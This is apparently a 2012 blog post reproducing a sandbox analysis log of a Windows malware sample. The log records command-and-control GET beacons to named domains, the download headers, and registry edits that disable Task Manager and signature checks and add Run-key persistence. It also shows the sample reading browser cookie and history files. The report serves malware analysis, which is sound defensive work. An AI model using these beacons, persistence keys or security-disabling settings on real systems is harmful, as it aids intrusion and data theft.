Wednesday, May 2, 2012

Antivirus scan for at UTC - VirusTotal

Antivirus scan for at UTC - VirusTotal


Bot Communication Details:
Server DNS Name: unocardgam.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/?ylOdR9GQqXquMlTvsmXlkaz1x3Eb/A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)unocardgam.com

OthersCache-Control: no-cache
Server DNS Name: whatisadebima.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)whatisadebima.com

OthersCache-Control: no-cache
Server DNS Name: psardcreator.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)psardcreator.com

OthersCache-Control: no-cache
Server DNS Name: nardelfire.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)nardelfire.com

OthersCache-Control: no-cache
Server DNS Name: meijeroneca.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)meijeroneca.com

OthersCache-Control: no-cache
Server DNS Name: windoscarsep.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/?ylOdR9GQqXquMlTvsmXlkaz1x3Eb/A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)windoscarsep.com

OthersCache-Control: no-cache
Server DNS Name: pastecultu.com   Service Port: 80
DirectionCommandUser-AgentHostConnectionPragma
GET/s.php?0Q9oBPXEN0uECUgzEJ95RQsajjnvq1aG3F/2q5oNqwOd0A== HTTP/1.1Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)pastecultu.com

OthersCache-Control: no-cache
  
Download Source Headers
GET 
 /04451 HTTP/1.1
X-Powered-By 
 PHP/5.2.17
User-Agent 
 Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_10
Content-Length 
 328192
Host 
 his.vafex.in
Content-Disposition 
 attachment; filename=2917522723.exe
Accept 
 text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Vary 
 User-Agent
Connection 
 keep-alive
Keep-Alive 
 timeout=1, max=100
HTTP 
 1.1 200 OK
Connection 
 Keep-Alive
Date 
 Wed, 02 May 2012 15:13:23 GMT
Content-Type 
 application/octet-stream
Server 
 Apache/2


  
OS Change Detail   (version: 4.581)     | Items: 959  | OS Info: Microsoft WindowsXP Professional 5.1 sp2   Top
TypeMode/ClassDetails (Path/Message/Protocol/Hostname/Qtype/ListenPort etc.)Process IDParent IDFile Size
Analysis
Malware

Os
No:  2    Name:  windows    Version:  5.1.2600    Service Pack:  2   
Os  Monitor
No:  3    Build:  69105    Date:  Jan 24 2012    Time:  14:44:55   
Uac
Privilege use
SeTcbPrivilege
Uac
Service
Telephony
Process
Started
C:\2917522723.exe
  Parentname:  C:\WINDOWS\system32\cmd.exe
  Command Line:  "c:\2917522723.exe"
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
11081228328192
Malicious  Alert
Anomaly  Tag
Message:   Startup behavior anomalies observed    Detail:   A new process has been launched   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 70 3e a6 4b 06 8e ca d2 b6 66 f7 f7 c
   d d6 ae 49 0d 8f 73 b2 2d 03 ce 7c 71 b4 af fa 1a c0 e4 99 7c 74 71 7a 63 f8 36 7d 1a 3b 58 ad b8
    8a 31 7b a3 d7 70 3b 2c 6b 23 06 94 6b 85 f3 8e 51 b4 57 fe 51 ae 40 4f 00 0e 30 64 90 7b 6e 38
   9d 5f 5a
1108
Malicious  Alert
Misc  Anomaly
Message:   Cryptographic operations performed    Detail:   Malware performing cryptographic operations   
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  WaitForMultipleObjectsEx   Address:  0x77df9b26
  Params:  [2, 0x00c3ff6c, 0, 300000, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x010511fa
  Params:  [5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Tracking Sleep/SleepEx API Call    Detail:   Malware Sleep   
Uac
Privilege use
SeTcbPrivilege
Uac
Service
Remote Access Connection Manager
API Call
  API Name:  GetLocalTime   Address:  0x00410df5
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemTime   Address:  0x00410dff
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c5 83 42 e5 11 91 34 20 35 57 59 50 c
   4 e6 21 78 83 84 16 78 69 da 5a 65 b8 f3 73 aa dd b0 6d 84 24 f9 f1 40 69 90 bd 76 ad 35 61 e2 54
    e1 3c a7 0c 3f 3c 40 a8 ce 36 f1 87 75 3a 27 3a e7 2c 21 aa 82 b4 7b 1d b4 44 7a 8e 98 25 d4 b6
   0a b6 f1
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = c0 6a a2 93 99 7e 7d ca 3e 44 1c a3 2
   2 6e e8 dd 38 0c 85 20 ba b9 af 58 56 d0 ca 3b e4 d1 c0 48 97 4b 18 e9 cb 3e 4a 1c b3 b6 3b b9 2f
    02 af 14 38 0c d8 43 28 21 10 6c 28 1b 22 2c a9 86 fa 3d 8d 30 6e 81 f4 79 8f ae a3 92 74 c9 69
   bc 0e 62
1108
API Call
  API Name:  IsDebuggerPresent   Address:  0x5ad7b1ba
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Malware trying to detect the presence of a debugger    Detail:   Debugger awareness detected   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 18 91 9f 71 30 b0 ee ba 49 9e 86 b7 8
   c ae 3f 1a 54 21 76 f8 5c 2a 71 73 e3 d7 8b b0 84 8c 37 2d 1c 92 1c 35 7b 41 85 28 85 55 9f d3 b4
    c1 2b 89 22 05 74 65 e1 ef d4 13 d6 05 77 41 2c a2 27 24 46 62 88 32 3f f9 a4 ff ed 1f f4 50 14
   40 53 ef
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 97 e4 25 bd 0c 2c 25 26 f1 3e 0b b3 0
   c c0 9a ef 0d 3e f8 f5 8a 20 9e 12 04 73 1b 47 6b ee e8 85 44 2b cd 48 f4 74 69 55 6e a3 41 37 a7
    eb 01 5d 9c a0 4c 3f 10 ae 37 f9 ec 8f 7b e5 3f 92 93 3f 71 7a f5 6b 0c 55 89 5b 06 14 26 3f 2b
   95 73 dc
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 6d 95 39 20 e6 1c 9c 82 fb bd ae 24 5
   4 aa 8b ed 76 dc c7 3a 25 f0 42 8a 78 96 47 e9 50 b7 c0 ae 81 47 fe 1c 27 3a 38 89 45 7a 46 66 46
    95 57 d3 4e 46 8c e8 a9 62 5b da d9 f0 82 ca 14 e4 0e 64 f5 25 2f 33 3d 6c 5e 11 c1 ae 76 14 28
   c5 1d 19
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = 82 5e f9 d7 ae 97 df 17 30 8e 4b ed 7
   1 02 86 e3 ca 11 d4 4e 30 ea ea e3 24 4c 4c 51 78 d9 02 b4 90 e8 25 59 2e 67 ab 5f 45 bd 6d f6 2a
    f9 82 82 f1 63 59 21 0e d6 73 28 f2 f0 e8 54 d0 75 09 e3 b9 76 3a ef b3 af 8b 4b cf a6 de b5 0b
   bc 93 a3
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = f2 c9 42 88 6d 5e 9e 62 0a 98 0d 47 9
   1 56 22 18 98 93 ca e8 a3 4d 4c 08 78 09 f9 61 35 74 6c bb b8 9b 69 6d 16 25 cb 41 e4 c0 48 6d 63
    af 22 63 e9 9e 6f b9 b1 d7 ac 38 b7 f2 80 3f b5 ab f4 bd b6 95 28 98 90 96 43 b7 d4 ec d3 7c 9e
   e2 c7 e2
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Params:  [0x000006f0, 5000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76fd8a1d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040cf43
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x77f67d62
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Critical error message boxes hidden    Detail:   Malware hiding critical error message boxes   
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData"
   = C:\Documents and Settings\All Users\Application Data
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObject   Address:  0x0040ce2d
  Params:  [0x000005c8, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
\BaseNamedObjects\b0a589e3-5bf6-41e1-82a1-16e7c6b4417c
1108
API Call
  API Name:  Sleep   Address:  0x0040148b
  Params:  [120000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   Anti-VM evasion detected (long sleep call)    Detail:   Malware calling Win32 Sleep() or SleepEx() with a long timeout   
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Params:  [60000]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
4 Repeated items skipped
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Malicious  Alert
Misc  Anomaly
Message:   10+ sleep calls    Detail:   Malware calling sleep 10+ times   
API Call
  API Name:  Sleep   Address:  0x0040ca6b
  Params:  [1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  Process32FirstW   Address:  0x0040c8c6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
13 Repeated items skipped
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\System
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\System\"DisableTaskMgr" = 0x00000001
1108
Malicious  Alert
Misc  Anomaly
Detail:   TaskManager disabled   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"DisableTaskMgr" = 0x000
   00001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Internet Explorer\Dow
   nload\"CheckExeSignatures" = no
1108
Malicious  Alert
Misc  Anomaly
Message:   Malware tampering with system security settings    Detail:   Malware disabling signed binary check   
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Attachments
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Attachments\"SaveZoneInformation" = 0x00000001
1108
Malicious  Alert
Misc  Anomaly
Message:   Windows explorer settings tampered    Detail:   Malware modifying windows explorer settings   
Regkey
Added
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Associations
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Associations\"LowRiskFileTypess" = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.
   htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;.scr;
1108
File
Created
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1108
File
Close
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
1108328192
Process
Started
C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Parentname:  C:\2917522723.exe
  Command Line:  "C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe"
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
14361108328192
Malicious  Alert
Misc  Anomaly
Message:   Chained executions observed    Detail:   Malware starting multiple instances of itself   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"WqOvLTCdmDgTIK.exe" = C:\Documents
   and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1108
Malicious  Alert
Misc  Anomaly
Message:   Startup services added    Detail:   Malware adding itself (non-DLL) to windows startup areas   
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Cache" = C:\Documents and Settings\admin\Local Settings\Temporary Inter
   net Files
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"Cookies" = C:\Documents and Settings\admin\Cookies
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"History" = C:\Documents and Settings\admin\Local Settings\History
1108
File
Open
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\index.dat
110865536
Folder
Open
C:\Documents and Settings\admin\Cookies
1108
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
110832768
Malicious  Alert
Data  Theft
Message:   Internet Explorer cookie index read    Detail:   Malware reading IE cookie index   
File
Open
C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat
110832768
Malicious  Alert
Data  Theft
Message:   Internet Explorer history index read    Detail:   Malware reading IE history index   
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Cryptography\RNG\"Seed" = ef f1 16 99 05 45 d4 7b 2a 76 30 cd 6
   9 00 83 e0 2a 53 f3 ca c0 2c 1f 90 7b 83 1d a2 1b 05 16 00 1b 9e 21 22 cf c5 85 bc 10 ee 5a d8 40
    bb 40 2e 89 ea d7 18 3b 93 c1 0f 9b 99 da 65 3d 9b c3 6d 19 25 c9 36 b9 db 3f c4 ce 0e b5 94 80
   72 e3 d8
1436
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
Mutex
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76ee27b6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForSingleObjectEx   Address:  0x77e80acb
  Params:  [0x000004f1, 900000, 1]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
Mutex
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
1436
API Call
  API Name:  SetErrorMode   Address:  0x769c7b85
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x769c7bc7
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
API Call
  API Name:  Sleep   Address:  0x0040120c
  Params:  [200]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  WaitForMultipleObjectsEx   Address:  0x77df9b26
  Params:  [2, 0x00c3ff6c, 0, 300000, 1]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1108
API Call
  API Name:  GetSystemDirectoryW   Address:  0x76ee27b6
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c8219fb
  Params:  [0x00008001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Params:  [0x00000001]
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
3 Repeated items skipped
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\"MigrateProxy" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\"ProxyEnable" = 0x00000000
1108
Malicious  Alert
Misc  Anomaly
Message:   Browser settings tampered    Detail:   Malware modifying browser proxy settings   
Regkey
Setval
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVers
   ion\Internet Settings\"ProxyEnable" = 0x00000000
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 0b 00 00 00 01 00 00 00 0d 00
    00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0
   7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
1108
Malicious  Alert
Misc  Anomaly
Message:   Network settings tampered    Detail:   Browser network configuration modified   
API Call
  API Name:  Sleep   Address:  0x010511fa
  Params:  [5000]
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\ZoneAttributeCacheCounterMutex
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1108
Mutex
\BaseNamedObjects\ZoneAttributeCacheCounterMutex
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"ProxyBypass" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"IntranetName" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
HardwareAccessDetection
  Address:  0x0000000000000000
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Mutex
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  psardcreator.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.2   Hostname:  psardcreator.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.2
  Imagepath:  C:\2917522723.exe
1108
Malicious  Alert
Misc  Anomaly
Message:   Network outbound communication attempted    Detail:   Malware attempting connections via standard ports   
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  whatisadebima.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.3   Hostname:  whatisadebima.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.3
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  nardelfire.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.4   Hostname:  nardelfire.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.4
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.2
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  pastecultu.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.5   Hostname:  pastecultu.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.5
  Imagepath:  C:\2917522723.exe
1108
API Call
  API Name:  GetSystemTime   Address:  0x771b1a78
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
API Call
  API Name:  GetSystemDirectoryA   Address:  0x76f2916a
  Imagepath:  C:\2917522723.exe   DLL Name:  kernel32
1108
Network
Dns  Query
  Protocol  Type:  udp   Qtype:  Host Address   Hostname:  meijeroneca.com
  Imagepath:  C:\2917522723.exe
1108
Network
Dns  Query  Answer
  IP Address:  199.16.199.6   Hostname:  meijeroneca.com
  Imagepath:  C:\2917522723.exe
1108
Network
Connect
  Protocol  Type:  tcp   Destination  Port:  80   IP Address:  199.16.199.6
  Imagepath:  C:\2917522723.exe
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Internet Explorer\Dow
   nload\"CheckExeSignatures" = no
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Attachments\"SaveZoneInformation" = 0x00000001
1108
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Policies\Associations\"LowRiskFileTypess" = .zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.
